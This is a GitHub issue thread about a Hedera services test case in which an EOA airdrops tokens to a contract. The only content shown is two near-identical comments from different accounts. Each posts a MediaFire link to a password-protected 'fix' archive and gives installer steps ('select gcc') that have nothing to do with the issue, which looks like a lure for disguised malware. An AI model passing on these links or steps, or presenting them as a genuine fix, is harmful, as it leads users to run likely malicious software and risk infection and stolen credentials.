### ISSUE TITLE
(AIRDROP_TO_CONTRACT_14) EOA account airdrops multiple tokens to a contract with free auto association slots

### ISSUE THREAD

**Issue by vtronkov** [hashgraph/hedera-services#15180]

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
